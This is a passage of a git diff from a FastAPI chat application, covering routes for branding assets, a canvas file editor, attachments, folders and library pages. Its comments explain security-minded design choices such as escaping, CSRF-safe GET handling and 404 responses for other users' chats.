anybody has signed in, and a browser fetches a stylesheet and a launcher icon
|
||||
outside any page's session.
|
||||
|
||||
What that exposes is a file an administrator uploaded on purpose to be shown to
|
||||
everybody, under a random filename, in a format that cannot execute in an
|
||||
`<img>` — `services/uploads.py:ALLOWED_TYPES` is what makes the last part true,
|
||||
and it is why SVG is not in it.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from fastapi import APIRouter, HTTPException, Response, status
|
||||
from fastapi.responses import FileResponse
|
||||
|
||||
from lembas.services import branding as branding_service
|
||||
from lembas.services import uploads
|
||||
|
||||
router = APIRouter(tags=["branding"])
|
||||
|
||||
|
||||
@router.get("/branding.css", include_in_schema=False)
|
||||
async def branding_css() -> Response:
|
||||
"""The custom themes and the custom CSS.
|
||||
|
||||
A route rather than an inline `<style>` in `base.html`, which is a security
|
||||
property before it is a caching one: an external stylesheet has no HTML
|
||||
context to escape from, so an administrator's CSS cannot become markup
|
||||
however it is written. Inline, the same text would be one `</style>` away
|
||||
from being a script on every page.
|
||||
|
||||
Cached hard and busted by a query string. `base.html` links this with
|
||||
`?v={{ brand.revision }}`, a hash of everything below, so the URL changes
|
||||
exactly when the stylesheet does. Without that the browser's cache is what
|
||||
decides when a rebrand takes effect, which is a save that looks like it
|
||||
worked and did nothing.
|
||||
"""
|
||||
brand = branding_service.snapshot()
|
||||
return Response(
|
||||
branding_service.stylesheet(brand),
|
||||
media_type="text/css",
|
||||
headers={"Cache-Control": "public, max-age=604800"},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/branding/{filename}", include_in_schema=False)
|
||||
async def branding_asset(filename: str) -> Response:
|
||||
"""A logo, a favicon, or a launcher icon derived from one."""
|
||||
path = uploads.branding_image_path(filename)
|
||||
if path is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "No such file.")
|
||||
return FileResponse(
|
||||
path,
|
||||
media_type=uploads.media_type_for(filename),
|
||||
# Public, unlike a model avatar: this is served to somebody who is not
|
||||
# signed in, so there is nothing private to keep out of a shared cache.
|
||||
# Names are random, so a replacement is a new URL.
|
||||
headers={
|
||||
"Cache-Control": "public, max-age=604800",
|
||||
"X-Content-Type-Options": "nosniff",
|
||||
},
|
||||
)
|
||||
@@ -1,242 +0,0 @@
|
||||
"""The canvas panel: open a file, read it, change it, save it.
|
||||
|
||||
Every route answers with an HTML fragment, errors included. An exception page
|
||||
swapped into a side panel is a blank side panel, and a panel that goes blank
|
||||
tells somebody nothing about why.
|
||||
|
||||
`GET` never moves the active tab. There is no CSRF token in this application and
|
||||
the session cookie is SameSite Lax, so a state-changing GET is a link somebody
|
||||
can be made to follow -- and one of the things a tab can be is a file on
|
||||
somebody's server.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.db.models import Chat, User
|
||||
from lembas.services import canvas as canvas_service
|
||||
from lembas.services import generation as generation_service
|
||||
from lembas.services.agent import draft as draft_service
|
||||
from lembas.services.agent.base import Conflict
|
||||
from lembas.services.markdown import highlight_code, render_markdown
|
||||
from lembas.web.templating import templates
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/api/chats", tags=["canvas"])
|
||||
|
||||
|
||||
def _owned_chat(db: DBSession, chat_id: str, user_id: str) -> Chat:
|
||||
"""404 rather than 403 for somebody else's chat: whether it exists at all is
|
||||
not this account's business.
|
||||
|
||||
A draft id resolves to a transient `Chat` -- constructed, never saved --
|
||||
which is what lets the canvas work on the new-chat screen without any of the
|
||||
six sources learning that drafts exist. See services/agent/draft.py.
|
||||
"""
|
||||
if draft_service.is_draft(chat_id):
|
||||
draft = draft_service.get(chat_id, user_id)
|
||||
if draft is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
|
||||
return draft_service.as_chat(draft)
|
||||
|
||||
chat = db.get(Chat, chat_id)
|
||||
if chat is None or chat.user_id != user_id:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
|
||||
return chat
|
||||
|
||||
|
||||
def _remember_tabs(chat: Chat, state: dict) -> bool:
|
||||
"""Put the tab strip back where it came from. True when it was a draft.
|
||||
|
||||
A draft's tabs live in the registry rather than on a row, so the two write
|
||||
paths below fork here rather than each remembering to check.
|
||||
"""
|
||||
if not draft_service.is_draft(chat.id):
|
||||
return False
|
||||
draft = draft_service.get(chat.id, chat.user_id)
|
||||
if draft is not None:
|
||||
draft.canvas_json = dict(state or {})
|
||||
return True
|
||||
|
||||
|
||||
async def _panel(
|
||||
request: Request,
|
||||
db: DBSession,
|
||||
user: User,
|
||||
chat: Chat,
|
||||
*,
|
||||
key: str = "",
|
||||
message: str = "",
|
||||
conflict: canvas_service.Doc | None = None,
|
||||
mine: str = "",
|
||||
) -> Response:
|
||||
"""The strip and whichever tab is in front, as one fragment.
|
||||
|
||||
Both together, always. Rendering only the body would leave the strip showing
|
||||
a tab that is no longer there after a close, and rendering only the strip
|
||||
would leave the previous file on screen after a switch.
|
||||
"""
|
||||
wanted = key or canvas_service.active_of(chat)
|
||||
doc: canvas_service.Doc | None = None
|
||||
error = message
|
||||
if wanted and not error:
|
||||
try:
|
||||
doc = await canvas_service.load(db, user, chat, wanted)
|
||||
except canvas_service.Refused as exc:
|
||||
error = str(exc)
|
||||
except Exception: # pragma: no cover - a machine going away mid-request
|
||||
log.exception("canvas could not open %s", wanted)
|
||||
error = "That could not be opened."
|
||||
|
||||
body = ""
|
||||
if doc is not None and doc.text:
|
||||
# The one `|safe` in this panel, and it is safe because pygments escapes
|
||||
# what it is given. Markdown goes through render_markdown, the single
|
||||
# path in this application allowed to emit HTML. Everything else -- the
|
||||
# editor's contents, the titles, the paths -- is escaped by Jinja.
|
||||
body = render_markdown(doc.text) if doc.markdown else highlight_code(doc.text, doc.language)
|
||||
|
||||
return templates.TemplateResponse(
|
||||
request,
|
||||
"chat/_canvas_inner.html",
|
||||
{
|
||||
"user": user,
|
||||
"chat": chat,
|
||||
"tabs": canvas_service.tabs_of(chat),
|
||||
"active": wanted,
|
||||
"doc": doc,
|
||||
"rendered": body,
|
||||
"error": error,
|
||||
"conflict": conflict,
|
||||
"mine": mine,
|
||||
"canvas_agent": canvas_service.agent_ready(db, user, chat) is not None,
|
||||
# What the "Open a file" dialog browses. The endpoint it calls is
|
||||
# hung off the profile rather than the chat, so the button has to
|
||||
# carry the profile -- and the directory it should start in, or it
|
||||
# opens at the account's home and every path is a walk from there.
|
||||
"agent_profile_id": chat.ssh_profile_id or "",
|
||||
"agent_dir": chat.project_dir or "",
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/{chat_id}/canvas")
|
||||
async def show(request: Request, db: Db, user: RequiredUser, chat_id: str, key: str = ""):
|
||||
"""Whatever is in front, or the tab named by `?key=`.
|
||||
|
||||
Read-only in every sense: a `?key=` that is not open does not become open,
|
||||
it is simply shown. Opening is a POST.
|
||||
"""
|
||||
chat = _owned_chat(db, chat_id, user.id)
|
||||
return await _panel(request, db, user, chat, key=key)
|
||||
|
||||
|
||||
@router.post("/{chat_id}/canvas/tabs")
|
||||
async def open_tab(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
chat_id: str,
|
||||
key: str = Form(...),
|
||||
title: str = Form(""),
|
||||
):
|
||||
"""Open a file, or bring an already-open one to the front.
|
||||
|
||||
Idempotent, because opening what is already open is switching to it -- the
|
||||
same reason `generation.ensure` is idempotent.
|
||||
"""
|
||||
chat = _owned_chat(db, chat_id, user.id)
|
||||
|
||||
# Two of the six sources need a real row behind them, and one of those is a
|
||||
# hole rather than an inconvenience -- see draft.SOURCES_NEEDING_A_CHAT.
|
||||
# Refused by source name, here, rather than left to fall out of an id
|
||||
# comparison somewhere further in.
|
||||
if draft_service.is_draft(chat.id) and draft_service.refuses(key.split(":", 1)[0]):
|
||||
return await _panel(
|
||||
request, db, user, chat,
|
||||
message="That can only be opened once this chat exists. Send a message first.",
|
||||
)
|
||||
|
||||
try:
|
||||
doc = await canvas_service.load(db, user, chat, key)
|
||||
except canvas_service.Refused as exc:
|
||||
return await _panel(request, db, user, chat, message=str(exc))
|
||||
|
||||
state = canvas_service.open_tab(
|
||||
dict(chat.canvas_json or {}),
|
||||
{"key": doc.key, "title": title.strip() or doc.title, "source": doc.key.split(":")[0]},
|
||||
)
|
||||
# Reassigned rather than mutated: an in-place edit of a JSON column is not
|
||||
# reliably detected as a change.
|
||||
chat.canvas_json = state
|
||||
if not _remember_tabs(chat, state):
|
||||
db.commit()
|
||||
|
||||
# A reply running right now holds its own snapshot, seeded when it started.
|
||||
# Without this the next frame it sends would contradict what was just
|
||||
# swapped in -- the same reach into live state `request_stop` makes.
|
||||
live = generation_service.running_for(chat.id)
|
||||
if live is not None:
|
||||
canvas_service.open_tab(live.canvas, {"key": doc.key, "title": doc.title})
|
||||
|
||||
return await _panel(request, db, user, chat, key=doc.key)
|
||||
|
||||
|
||||
@router.post("/{chat_id}/canvas/tabs/close")
|
||||
async def close_tab(
|
||||
request: Request, db: Db, user: RequiredUser, chat_id: str, key: str = Form(...)
|
||||
):
|
||||
chat = _owned_chat(db, chat_id, user.id)
|
||||
chat.canvas_json = canvas_service.close_tab(dict(chat.canvas_json or {}), key)
|
||||
if not _remember_tabs(chat, chat.canvas_json):
|
||||
db.commit()
|
||||
|
||||
live = generation_service.running_for(chat.id)
|
||||
if live is not None:
|
||||
canvas_service.close_tab(live.canvas, key)
|
||||
|
||||
return await _panel(request, db, user, chat)
|
||||
|
||||
|
||||
@router.post("/{chat_id}/canvas/save")
|
||||
async def save(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
chat_id: str,
|
||||
key: str = Form(...),
|
||||
text: str = Form(""),
|
||||
revision: str = Form(""),
|
||||
):
|
||||
"""Write it back.
|
||||
|
||||
A conflict comes back as a card, at 200, so htmx swaps it: the panel has to
|
||||
be able to show Overwrite, Discard mine and Show what changed, and none of
|
||||
those can be offered from an error status htmx will not render. Never save
|
||||
silently over a change; never discard silently either.
|
||||
"""
|
||||
chat = _owned_chat(db, chat_id, user.id)
|
||||
|
||||
try:
|
||||
await canvas_service.save(db, user, chat, key, text, revision)
|
||||
except Conflict:
|
||||
try:
|
||||
theirs = await canvas_service.load(db, user, chat, key)
|
||||
except canvas_service.Refused as exc:
|
||||
return await _panel(request, db, user, chat, key=key, message=str(exc))
|
||||
return await _panel(request, db, user, chat, key=key, conflict=theirs, mine=text)
|
||||
except canvas_service.Refused as exc:
|
||||
return await _panel(request, db, user, chat, key=key, message=str(exc))
|
||||
except Exception: # pragma: no cover - the machine going away mid-write
|
||||
log.exception("canvas could not save %s", key)
|
||||
return await _panel(
|
||||
request, db, user, chat, key=key, message="That could not be saved."
|
||||
)
|
||||
|
||||
return await _panel(request, db, user, chat, key=key)
|
||||
+69
-839
File diff suppressed because it is too large
Load Diff
+1
-36
@@ -19,7 +19,7 @@ from fastapi.responses import FileResponse
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.db.models import Attachment, Chat, Document, KnowledgeBase, Note
|
||||
from lembas.db.models import Attachment, Document, KnowledgeBase, Note
|
||||
from lembas.security import permissions
|
||||
from lembas.services import files as files_service
|
||||
from lembas.services import settings_store
|
||||
@@ -189,41 +189,6 @@ async def attach_from_note(
|
||||
)
|
||||
|
||||
|
||||
@router.post("/from-scratch", dependencies=[Depends(require_permission("files.upload"))])
|
||||
async def attach_from_scratch(
|
||||
request: Request, db: Db, user: RequiredUser, chat_id: str = Form("")
|
||||
) -> Response:
|
||||
"""Attach this chat's scratch document.
|
||||
|
||||
A copy, like every other attach path, and here the reason is at its
|
||||
sharpest: the pad goes on being written after the message is sent, by the
|
||||
person and by the model, and a transcript that changed underneath itself
|
||||
every time either of them typed would be no record at all.
|
||||
"""
|
||||
from lembas.services import scratch as scratch_service
|
||||
|
||||
chat = db.get(Chat, chat_id) if chat_id else None
|
||||
if chat is None or chat.user_id != user.id:
|
||||
return _not_available(request, "scratch document")
|
||||
|
||||
doc = scratch_service.get(db, chat)
|
||||
if doc is None or not (doc.body or "").strip():
|
||||
return _not_available(request, "scratch document")
|
||||
|
||||
return _chip(
|
||||
request,
|
||||
files_service.store_text(
|
||||
db,
|
||||
user_id=user.id,
|
||||
chat_id=chat.id,
|
||||
filename=f"{doc.title or 'scratch'}.md",
|
||||
text=doc.body,
|
||||
source_path=doc.title or "Scratch",
|
||||
source_label="Scratch",
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
@router.post("/from-skill", dependencies=[Depends(require_permission("files.upload"))])
|
||||
async def attach_from_skill(
|
||||
request: Request, db: Db, user: RequiredUser, skill_id: str = Form(""), chat_id: str = Form("")
|
||||
|
||||
+12
-138
@@ -2,13 +2,11 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from fastapi import APIRouter, Depends, Form, HTTPException, Request, Response, status
|
||||
from sqlalchemy import select
|
||||
from fastapi import APIRouter, Depends, Form, HTTPException, Response, status
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.db.models import KINDS, Folder
|
||||
from lembas.services.agent import policy as agent_policy
|
||||
from lembas.db.models import Folder
|
||||
|
||||
# Every route here manages folders, so the guard belongs on the router.
|
||||
router = APIRouter(
|
||||
@@ -37,62 +35,6 @@ def _depth_of(db: DBSession, folder: Folder | None) -> int:
|
||||
return depth
|
||||
|
||||
|
||||
def _descendants(db: DBSession, folder: Folder) -> set[str]:
|
||||
"""Every folder under this one, and this one. Bounded by MAX_DEPTH."""
|
||||
found = {folder.id}
|
||||
frontier = [folder.id]
|
||||
for _ in range(MAX_DEPTH + 1):
|
||||
if not frontier:
|
||||
break
|
||||
children = list(
|
||||
db.scalars(select(Folder).where(Folder.parent_id.in_(frontier)))
|
||||
)
|
||||
frontier = [c.id for c in children if c.id not in found]
|
||||
found.update(frontier)
|
||||
return found
|
||||
|
||||
|
||||
def _subtree_height(db: DBSession, folder: Folder) -> int:
|
||||
"""How many levels this folder's own subtree occupies, itself included.
|
||||
|
||||
A move has to consider it: the constraint is on the *deepest leaf* after the
|
||||
move, not on the folder being dragged.
|
||||
"""
|
||||
height = 1
|
||||
frontier = [folder.id]
|
||||
for _ in range(MAX_DEPTH + 1):
|
||||
children = list(
|
||||
db.scalars(select(Folder.id).where(Folder.parent_id.in_(frontier)))
|
||||
)
|
||||
if not children:
|
||||
break
|
||||
height += 1
|
||||
frontier = children
|
||||
return height
|
||||
|
||||
|
||||
def candidate_parents(db: DBSession, user_id: str, folder: Folder) -> list[Folder]:
|
||||
"""Folders this one could be moved into.
|
||||
|
||||
Everything the person owns, minus the folder itself and its own subtree --
|
||||
which is the cycle guard in `update_folder` stated as a list rather than as
|
||||
a refusal. A picker that offers a move the route will reject is a control
|
||||
that looks like it works.
|
||||
|
||||
Depth is checked at the route rather than filtered here: it depends on how
|
||||
tall *this* folder's subtree is, and a select that silently omitted a folder
|
||||
for that reason would be unexplainable from the screen.
|
||||
"""
|
||||
blocked = _descendants(db, folder)
|
||||
return [
|
||||
candidate
|
||||
for candidate in db.scalars(
|
||||
select(Folder).where(Folder.user_id == user_id).order_by(Folder.name)
|
||||
)
|
||||
if candidate.id not in blocked
|
||||
]
|
||||
|
||||
|
||||
def _refresh_sidebar() -> Response:
|
||||
"""Tell the browser to reload so the tree re-renders.
|
||||
|
||||
@@ -105,26 +47,13 @@ def _refresh_sidebar() -> Response:
|
||||
return response
|
||||
|
||||
|
||||
def _prompted(request: Request) -> str:
|
||||
"""What somebody typed into an `hx-prompt` dialog, if anything.
|
||||
|
||||
htmx sends it as a header rather than a field, because the element carrying
|
||||
the attribute may not be a form control at all. `ui.js` swaps the browser's
|
||||
own prompt for the themed one and hands the answer back through the same
|
||||
header, so this reads identically either way.
|
||||
"""
|
||||
return (request.headers.get("HX-Prompt") or "").strip()
|
||||
|
||||
|
||||
@router.post("")
|
||||
async def create_folder(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
name: str = Form(""),
|
||||
name: str = Form("New folder"),
|
||||
parent_id: str = Form(""),
|
||||
) -> Response:
|
||||
name = name.strip() or _prompted(request)
|
||||
parent = _owned_folder(db, parent_id, user.id) if parent_id else None
|
||||
|
||||
# A cap on nesting, so a runaway client cannot build a tree deep enough to
|
||||
@@ -138,7 +67,7 @@ async def create_folder(
|
||||
db.add(
|
||||
Folder(
|
||||
user_id=user.id,
|
||||
name=name[:200] or "New folder",
|
||||
name=name.strip()[:200] or "New folder",
|
||||
parent_id=parent.id if parent else None,
|
||||
)
|
||||
)
|
||||
@@ -146,47 +75,21 @@ async def create_folder(
|
||||
return _refresh_sidebar()
|
||||
|
||||
|
||||
# The settings a folder hands to chats started inside it, and how far each may
|
||||
# run. A table rather than a run of `if` blocks so the save handler and the form
|
||||
# cannot come to disagree about which fields exist -- the same reasoning the
|
||||
# tool label table carries.
|
||||
_SEEDS = {
|
||||
"description": 500,
|
||||
"system_prompt": 20_000,
|
||||
"model_id": 300,
|
||||
"ssh_profile_id": 32,
|
||||
"project_dir": 1000,
|
||||
}
|
||||
|
||||
|
||||
@router.patch("/{folder_id}")
|
||||
async def update_folder(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
folder_id: str,
|
||||
name: str | None = Form(None),
|
||||
parent_id: str | None = Form(None),
|
||||
collapsed: bool | None = Form(None),
|
||||
) -> Response:
|
||||
"""Rename, move, collapse, or set what this folder hands to its chats.
|
||||
|
||||
Reads the raw form rather than declaring `Form(None)` parameters, because
|
||||
FastAPI cannot tell an empty field from an absent one -- a submitted `x=`
|
||||
arrives as None, so "clear this prompt" and "leave it alone" would be the
|
||||
same request. Key presence is the distinction, which is the rule
|
||||
`api/chats.py:update_chat` already follows and the reason every field here
|
||||
is clearable.
|
||||
"""
|
||||
folder = _owned_folder(db, folder_id, user.id)
|
||||
form = await request.form()
|
||||
|
||||
# A rename can arrive from a settings form or from an `hx-prompt` button on
|
||||
# the folder row; one route serves both. A blank name is ignored rather than
|
||||
# stored, since a folder nobody can see the name of is one nobody can find.
|
||||
name = str(form.get("name") or "").strip() or _prompted(request)
|
||||
if name:
|
||||
folder.name = name[:200]
|
||||
if name is not None and name.strip():
|
||||
folder.name = name.strip()[:200]
|
||||
|
||||
if "parent_id" in form:
|
||||
parent_id = str(form["parent_id"]).strip()
|
||||
if parent_id is not None:
|
||||
new_parent = _owned_folder(db, parent_id, user.id) if parent_id else None
|
||||
# Reparenting a folder into its own subtree would detach that subtree
|
||||
# from the root and make it unreachable.
|
||||
@@ -198,41 +101,12 @@ async def update_folder(
|
||||
"A folder cannot be moved inside itself.",
|
||||
)
|
||||
cursor = db.get(Folder, cursor.parent_id) if cursor.parent_id else None
|
||||
# And the depth cap, which `create_folder` has always applied and this
|
||||
# path never did -- moving a three-deep subtree under a six-deep folder
|
||||
# builds a tree nine deep, which is what MAX_DEPTH exists to keep out of
|
||||
# the recursive sidebar template. It went unnoticed because nothing in
|
||||
# the interface could submit `parent_id` at all until now.
|
||||
subtree = _subtree_height(db, folder)
|
||||
if new_parent is not None and _depth_of(db, new_parent) + subtree > MAX_DEPTH:
|
||||
raise HTTPException(
|
||||
status.HTTP_400_BAD_REQUEST,
|
||||
f"Folders cannot be nested more than {MAX_DEPTH} deep.",
|
||||
)
|
||||
folder.parent_id = new_parent.id if new_parent else None
|
||||
|
||||
if "collapsed" in form:
|
||||
folder.collapsed = str(form["collapsed"]).lower() in ("1", "true", "on", "yes")
|
||||
|
||||
for field, limit in _SEEDS.items():
|
||||
if field in form:
|
||||
setattr(folder, field, str(form[field]).strip()[:limit])
|
||||
|
||||
# Both are vocabularies rather than free text, and both accept "" for "no
|
||||
# opinion". Anything else is dropped rather than stored: a folder seeding a
|
||||
# kind that is not a kind would hand every chat started in it a value that
|
||||
# `_new_chat` then has to ignore anyway.
|
||||
if "kind" in form:
|
||||
wanted = str(form["kind"]).strip()
|
||||
folder.kind = wanted if wanted in KINDS else ""
|
||||
if "agent_mode" in form:
|
||||
wanted = str(form["agent_mode"]).strip()
|
||||
folder.agent_mode = wanted if wanted in agent_policy.MODES else ""
|
||||
if collapsed is not None:
|
||||
folder.collapsed = collapsed
|
||||
|
||||
db.commit()
|
||||
# One rule for every caller: reload. A rename or a move changes the tree,
|
||||
# and a save from the settings page comes back showing what was stored --
|
||||
# which is what somebody who pressed Save wants to see anyway.
|
||||
return _refresh_sidebar()
|
||||
|
||||
|
||||
|
||||
+41
-109
@@ -23,10 +23,12 @@ from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.api.pages import sidebar_context
|
||||
from lembas.db.models import (
|
||||
AUTHOR_USER,
|
||||
PRINCIPAL_GROUP,
|
||||
PRINCIPAL_USER,
|
||||
Document,
|
||||
Group,
|
||||
KnowledgeBase,
|
||||
Note,
|
||||
Persona,
|
||||
Skill,
|
||||
SkillRevision,
|
||||
User,
|
||||
@@ -38,7 +40,6 @@ from lembas.services.fetch import FetchError, fetch
|
||||
from lembas.services.library import documents as documents_service
|
||||
from lembas.services.library import memories as memories_service
|
||||
from lembas.services.library import notes as notes_service
|
||||
from lembas.services.library import retrieval
|
||||
from lembas.services.library import skills as skills_service
|
||||
from lembas.services.markdown import render_markdown
|
||||
from lembas.web.templating import render
|
||||
@@ -59,21 +60,32 @@ def _page(db: DBSession, query, page: int):
|
||||
return rows, {"page": page, "pages": pages, "total": total}
|
||||
|
||||
|
||||
def _shared_context(db: DBSession, user: User, resource, kind: str) -> dict:
|
||||
"""What the share placeholder needs, which is now three facts.
|
||||
|
||||
The panel itself is fetched from `api/sharing.py`, so the names, the search
|
||||
and the grants are no longer built here -- and neither is a query for every
|
||||
account on the instance on every detail page.
|
||||
"""
|
||||
def _shared_context(db: DBSession, user: User, resource) -> dict:
|
||||
"""Everything the share panel on a detail page needs."""
|
||||
grants = sharing.grants_for(db, resource)
|
||||
return {
|
||||
"can_share": permissions.has(db, user, "library.share"),
|
||||
"groups": list(db.scalars(select(Group).order_by(Group.name))),
|
||||
"people": list(
|
||||
db.scalars(select(User).where(User.id != user.id).order_by(User.name))
|
||||
),
|
||||
"shared_users": [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER],
|
||||
"shared_groups": [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP],
|
||||
"is_owner": resource.owner_id == user.id,
|
||||
"share_kind": kind,
|
||||
"share_id": resource.id,
|
||||
}
|
||||
|
||||
|
||||
def _apply_shares(db: DBSession, user: User, resource, form) -> None:
|
||||
if not permissions.has(db, user, "library.share") or resource.owner_id != user.id:
|
||||
return
|
||||
sharing.set_grants(
|
||||
db,
|
||||
resource,
|
||||
user_ids=form.getlist("share_user"),
|
||||
group_ids=form.getlist("share_group"),
|
||||
)
|
||||
|
||||
|
||||
# --- Shell -------------------------------------------------------------------
|
||||
@router.get("/library")
|
||||
async def library_home(user: RequiredUser):
|
||||
@@ -85,21 +97,9 @@ async def library_home(user: RequiredUser):
|
||||
# before /library/knowledge/{base_id}, or "document" is parsed as a base id.
|
||||
# FastAPI matches in registration order and this has bitten before.
|
||||
@router.get("/library/knowledge")
|
||||
async def knowledge_list(
|
||||
request: Request, db: Db, user: RequiredUser, error: str = "", shared: bool = False
|
||||
):
|
||||
"""The bases, not the documents. A library is a set of places first.
|
||||
|
||||
`shared=1` narrows to bases other people have given this reader — the same
|
||||
filter the notes and skills lists carry, and the one that makes "what have
|
||||
people shared with me?" a question with an answer.
|
||||
"""
|
||||
query = (
|
||||
select(KnowledgeBase).where(sharing.only_shared(KnowledgeBase, user))
|
||||
if shared
|
||||
else documents_service.visible_bases(db, user)
|
||||
)
|
||||
bases = list(db.scalars(query.order_by(KnowledgeBase.name)))
|
||||
async def knowledge_list(request: Request, db: Db, user: RequiredUser, error: str = ""):
|
||||
"""The bases, not the documents. A library is a set of places first."""
|
||||
bases = list(db.scalars(documents_service.visible_bases(db, user).order_by(KnowledgeBase.name)))
|
||||
counts = {
|
||||
base.id: db.scalar(
|
||||
select(func.count()).select_from(Document).where(Document.base_id == base.id)
|
||||
@@ -114,7 +114,6 @@ async def knowledge_list(
|
||||
"section": "knowledge",
|
||||
"bases": bases,
|
||||
"counts": counts,
|
||||
"shared": shared,
|
||||
"error": error,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
@@ -176,12 +175,7 @@ async def base_detail(
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That knowledge base is not available.")
|
||||
|
||||
if q.strip():
|
||||
# The reader's search box gets the same recall a model's does. `None`
|
||||
# when nothing is configured, which is the keyword search unchanged.
|
||||
vector = await retrieval.embed_query(db, q)
|
||||
rows = documents_service.search(
|
||||
db, user, q, limit=PAGE_SIZE, base_ids=[base.id], vector=vector
|
||||
)
|
||||
rows = documents_service.search(db, user, q, limit=PAGE_SIZE, base_ids=[base.id])
|
||||
pager = {"page": 1, "pages": 1, "total": len(rows)}
|
||||
else:
|
||||
rows, pager = _page(
|
||||
@@ -200,7 +194,7 @@ async def base_detail(
|
||||
"documents": rows,
|
||||
"q": q,
|
||||
"pager": pager,
|
||||
**_shared_context(db, user, base, "base"),
|
||||
**_shared_context(db, user, base),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
@@ -220,6 +214,7 @@ async def update_base(request: Request, db: Db, user: RequiredUser, base_id: str
|
||||
base.name = name
|
||||
base.description = str(form.get("description", "")).strip()[:2000]
|
||||
db.commit()
|
||||
_apply_shares(db, user, base, form)
|
||||
return RedirectResponse(
|
||||
f"/library/knowledge/{base.id}", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
@@ -246,7 +241,7 @@ async def upload_document(
|
||||
if base is not None and not sharing.can_write(base, user):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, "That base is not yours to add to.")
|
||||
|
||||
payload = await file.read(files_service.limits().max_upload_bytes + 1)
|
||||
payload = await file.read(files_service.MAX_UPLOAD_BYTES + 1)
|
||||
try:
|
||||
document = documents_service.store_upload(
|
||||
db,
|
||||
@@ -344,34 +339,14 @@ async def document_content(db: Db, user: RequiredUser, document_id: str) -> Resp
|
||||
|
||||
# --- Notes -------------------------------------------------------------------
|
||||
@router.get("/library/notes")
|
||||
async def notes_list(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
q: str = "",
|
||||
page: int = 1,
|
||||
shared: bool = False,
|
||||
):
|
||||
"""`shared=1` narrows to what other people have given this reader.
|
||||
|
||||
A separate view rather than a badge in the mixed list. A badge answers "is
|
||||
this mine?" for a row already on screen; the question somebody has is "what
|
||||
have people given me?", which a mixed list of two hundred cannot answer.
|
||||
Searching inside it is deliberately left out -- the search path returns
|
||||
ranked ids and re-filtering them by owner would silently shorten the page.
|
||||
"""
|
||||
async def notes_list(request: Request, db: Db, user: RequiredUser, q: str = "", page: int = 1):
|
||||
if q.strip():
|
||||
rows = notes_service.search(
|
||||
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
|
||||
)
|
||||
rows = notes_service.search(db, user, q, limit=PAGE_SIZE)
|
||||
pager = {"page": 1, "pages": 1, "total": len(rows)}
|
||||
else:
|
||||
query = (
|
||||
select(Note).where(sharing.only_shared(Note, user))
|
||||
if shared
|
||||
else notes_service.visible(db, user)
|
||||
rows, pager = _page(
|
||||
db, notes_service.visible(db, user).order_by(Note.updated_at.desc()), page
|
||||
)
|
||||
rows, pager = _page(db, query.order_by(Note.updated_at.desc()), page)
|
||||
return render(
|
||||
request,
|
||||
"library/notes.html",
|
||||
@@ -379,7 +354,6 @@ async def notes_list(
|
||||
"section": "notes",
|
||||
"notes": rows,
|
||||
"q": q,
|
||||
"shared": shared,
|
||||
"pager": pager,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
@@ -407,7 +381,7 @@ async def note_detail(request: Request, db: Db, user: RequiredUser, note_id: str
|
||||
"section": "notes",
|
||||
"note": note,
|
||||
"body_html": render_markdown(note.body),
|
||||
**_shared_context(db, user, note, "note"),
|
||||
**_shared_context(db, user, note),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
@@ -431,6 +405,7 @@ async def update_note(request: Request, db: Db, user: RequiredUser, note_id: str
|
||||
|
||||
form = await request.form()
|
||||
notes_service.update(db, note, title=str(form.get("title", "")), body=str(form.get("body", "")))
|
||||
_apply_shares(db, user, note, form)
|
||||
return RedirectResponse(f"/library/notes/{note.id}", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@@ -445,34 +420,12 @@ async def delete_note(db: Db, user: RequiredUser, note_id: str) -> Response:
|
||||
|
||||
# --- Skills ------------------------------------------------------------------
|
||||
@router.get("/library/skills")
|
||||
async def skills_list(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
q: str = "",
|
||||
page: int = 1,
|
||||
shared: bool = False,
|
||||
):
|
||||
"""`shared=1` narrows to what other people have given this reader.
|
||||
|
||||
A separate view rather than a badge in the mixed list. A badge answers "is
|
||||
this mine?" for a row already on screen; the question somebody has is "what
|
||||
have people given me?", which a mixed list of two hundred cannot answer.
|
||||
Searching inside it is deliberately left out -- the search path returns
|
||||
ranked ids and re-filtering them by owner would silently shorten the page.
|
||||
"""
|
||||
async def skills_list(request: Request, db: Db, user: RequiredUser, q: str = "", page: int = 1):
|
||||
if q.strip():
